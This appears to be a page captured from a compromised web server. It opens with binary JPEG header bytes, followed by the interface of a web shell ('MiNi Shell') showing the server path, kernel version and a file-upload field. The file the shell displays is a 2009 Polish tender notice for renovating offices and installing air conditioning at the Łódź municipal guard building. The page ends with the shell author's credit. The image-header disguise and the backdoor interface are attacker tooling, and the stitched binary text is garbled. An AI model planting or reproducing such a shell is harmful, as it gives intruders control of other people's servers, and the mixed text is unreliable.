JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/167352-N-2009.html

<p class="kh_header"><b>Łódź: REMONT POMIESZCZEŃ BIUROWYCH W BUDYNKU STRAŻY MIEJSKIEJ 
W ŁODZI PRZY UL. KILIŃSKIEGO 81 WRAZ Z DOSTAWĄ I MONTAŻEM URZĄDZEŃ KLIMATYZACYJNYCH</b><br>
<b>Numer ogłoszenia: 167352 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska w Łodzi , ul. Kilińskiego 81, 90-119 Łódź, woj. łódzkie, tel. 0-42 2502232, faks 0-42 2502200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazmiejska.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT POMIESZCZEŃ BIUROWYCH W BUDYNKU STRAŻY MIEJSKIEJ 
W ŁODZI PRZY UL. KILIŃSKIEGO 81 WRAZ Z DOSTAWĄ I MONTAŻEM URZĄDZEŃ KLIMATYZACYJNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont pomieszczeń biurowych znajdujących się na parterze budynku przy ul. Kilińskiego 81 w Łodzi oraz dostawa i montaż urządzeń klimatyzacyjnych.
Przedmiot zamówienia został podzielony na dwa zadania, tj.:
I. Zadanie nr 1 - Remont pomieszczeń biurowych
1) Zakres robót obejmuje w szczególności:
a) roboty ogólnobudowlane, a w tym:
- roboty rozbiórkowe i demontażowe,
- wykonanie ścianek działowych,
- wykonanie posadzek i podłoży,
- roboty w zakresie okładzin tynkarskich,
- roboty malarskie;
b) roboty w zakresie instalacji elektrycznych;
2) Szczegółowy opis przedmiotu zamówienia i zakres robót zawiera dokumentacja projektowa, która stanowi załącznik do specyfikacji istotnych warunków zamówienia.
3) Tam, gdzie na rysunkach, w specyfikacji technicznej wykonania i odbioru robót oraz w przedmiarach robót, zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów - zamawiający dopuszcza oferowanie materiałów równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych nie gorszych od założonych w w/w dokumentach.
4) Roboty budowlane muszą być prowadzone zgodnie z technologią przyjętą 
w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót oraz zgodnie z obowiązującymi normami i przepisami BHP. 
5) Wykonawca zobowiązany jest wykonać przedmiot umowy z materiałów własnych oraz zapewni kompetentne kierownictwo, pracowników i sprzęt niezbędne do wykonania robót w zakresie zapewniającym prawidłowe pod względem jakościowym i terminowe wykonanie przedmiotu umowy. Materiały i urządzenia muszą odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania 
w budownictwie - określonym w ustawie - Prawo Budowlane.
6) Materiały i urządzenia powstałe z demontażu wykonawca musi zagospodarować we własnym zakresie i pokryje wszelkie koszty związane z ich wywozem i utylizacją.
7) Wykonawca zobowiązany będzie do utrzymania porządku w trakcie trwania robót oraz uporządkowania terenu po ich ostatecznym zakończeniu i likwidacji zaplecza placu budowy.
8) Na wykonane roboty wykonawca udzieli minimum 36 miesięcy gwarancji.

II. Zadanie nr 2 - Dostawa i montaż urządzeń klimatyzacyjnych
1) Przedmiot zamówienia obejmuje dostawę i montaż klimatyzacji, składającej się 
z czterech klimatyzatorów oraz instalacji chłodniczej wykonanej z rur miedzianych, 
w pomieszczeniach biurowych znajdujących się w Łodzi przy ul. Kilińskiego 81.
2) Wymagane przez zamawiającego minimalne parametry techniczne klimatyzatorów oraz pozostałych elementów klimatyzacji określa specyfikacja istotnych warunków zamówienia.
3) Rozmieszczenie pomieszczeń biurowych wskazuje projekt architektoniczno - budowlany, który stanowi załącznik do specyfikacji istotnych warunków zamówienia.
4) Jednostki zewnętrzne (dachowe) klimatyzatorów wykonawca zainstaluje na ogniomurze, względnie na ścianie przylegającego budynku. Zamawiający nie dopuszcza montażu bezpośrednio na powierzchni dachu.
5) Wykonawca sporządzi dokumentację powykonawczą wykonanej instalacji zawierającą w szczególności rzut pomieszczeń z naniesioną instalacją oraz zaznaczonymi miejscami zamontowania klimatyzatorów (jednostki zewnętrzne 
i wewnętrzne), opis klimatyzatorów z podaniem ich podstawowych parametrów technicznych oraz karty gwarancyjne do wszystkich klimatyzatorów wchodzących 
w skład wykonanej klimatyzacji.
6) Zamawiający wymaga, aby wykonawca udzielił gwarancji na prawidłowe działanie klimatyzacji na okres minimum 60 miesięcy od daty odbioru przez zamawiającego, z zastrzeżeniem, że klimatyzatory muszą być objęte gwarancją producenta.
7) Zamawiający wymaga, aby wykonawca w okresie gwarancji wykonywał konserwację urządzeń w zakresie koniecznym do ich prawidłowego funkcjonowania. Konserwacja musi być wykonywana 2 razy w roku. Cena usług konserwacyjnych musi być wliczona w cenę oferty.
8) Zamawiający zaleca zapoznanie się z miejscem przyszłej realizacji zamówienia oraz jego otoczeniem w celu oceny, na własną odpowiedzialność, kosztów i ryzyka oraz innych czynników koniecznych do przygotowania oferty.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.25.00-4, 45.43.21.00-5, 45.32.40.00-4, 45.44.21.00-8, 45.31.12.00-2, 45.33.12.30-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania działalności w zakresie objętym niniejszą procedurą przetargową, tzn. ich działalność gospodarcza obejmuje zakresem rzeczowym przedmiot zamówienia i jest zarejestrowana w Krajowym Rejestrze Sądowym lub w ewidencji działalności gospodarczej, jeżeli odrębne przepisy nakładają obowiązek rejestracji;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w tym:
- dotyczy tylko zadania nr 1 - dysponują osobą, która pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami wymagane przez ustawę - Prawo budowlane oraz przynależącą do Okręgowej Izby Inżynierów Budownictwa,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 i 2 Ustawy.
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez wykonawcę oświadczeń i dokumentów na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający się o uzyskanie zamówienia składają wraz z ofertą następujące dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu:
1) oświadczenie o spełnieniu warunków udziału w postępowaniu, 
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5) wykaz osób wyznaczonych do realizacji zamówienia, zawierający wskazanie co najmniej jednej osoby wyznaczonej do pełnienia funkcji kierownika budowy, wraz 
z dokumentami potwierdzającymi posiadane kwalifikacje, uprawnienia budowlane 
i członkostwo w Okręgowej Izbie Inżynierów Budownictwa (dotyczy tylko zadania nr 1).
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 2 - 4 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości -wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.strazmiejska.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 90-119 Łódź, ul. Kilińskiego 81, pok. nr 25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 10:00, miejsce: 90 - 119 Łódź, ul. Kilińskiego 81, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W przypadku zadania nr 2 - z uwagi na jednocześnie prowadzone roboty remontowe - prace muszą być wykonywane etapowo, tj. 
1) I etap (przed lub równocześnie z wykonawcą zadania nr 1): wykonanie 
w pomieszczeniach wszystkich koniecznych prac przygotowawczych, a w tym wykonanie otworów w ścianach koniecznych do rozprowadzenia instalacji;
2) II etap (przed malowaniem pomieszczeń przez wykonawcę zadania nr 1): montaż klimatyzacji, przedmuchanie urządzeń i instalacji chłodniczych, próba szczelności oraz napełnienie instalacji czynnikiem chłodniczym;
3) III etap: (po zakończeniu prac przez wykonawcę zadania nr 1): uruchomienie klimatyzacji oraz uzyskanie niskich temperatur, przekazanie przedmiotu zamówienia i dokumentacji powykonawczej.
W przypadku zadania nr 2 termin wykonania zamówienia może zostać przedłużony, jeżeli wykonanie zamówienia w wyznaczonym terminie nie będzie możliwe z powodu opóźnienia w wykonaniu zamówienia przez wykonawcę zadania nr 1..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont pomieszczeń biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont pomieszczeń biurowych znajdujących się na parterze budynku przy ul. Kilińskiego 81 w Łodzi.
Zakres robót obejmuje w szczególności:
a) roboty ogólnobudowlane, a w tym:
- roboty rozbiórkowe i demontażowe,
- wykonanie ścianek działowych,
- wykonanie posadzek i podłoży,
- roboty w zakresie okładzin tynkarskich,
- roboty malarskie;
b) roboty w zakresie instalacji elektrycznych;
Szczegółowy opis przedmiotu zamówienia i zakres robót zawiera dokumentacja projektowa, która stanowi załącznik do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.25.00-4, 45.43.21.00-5, 45.44.21.00-8, 45.31.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż urządzeń klimatyzacyjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę i montaż klimatyzacji, składającej się 
z czterech klimatyzatorów oraz instalacji chłodniczej wykonanej z rur miedzianych, 
w pomieszczeniach biurowych znajdujących się na parterze budynku Straży Miejskiej w Łodzi przy ul. Kilińskiego 81.
Wymagane przez zamawiającego minimalne parametry techniczne klimatyzatorów oraz pozostałych elementów klimatyzacji określa specyfikacja istotnych warunków zamówienia. 
Rozmieszczenie pomieszczeń biurowych wskazuje projekt architektoniczno - budowlany, który stanowi załącznik do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.30-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com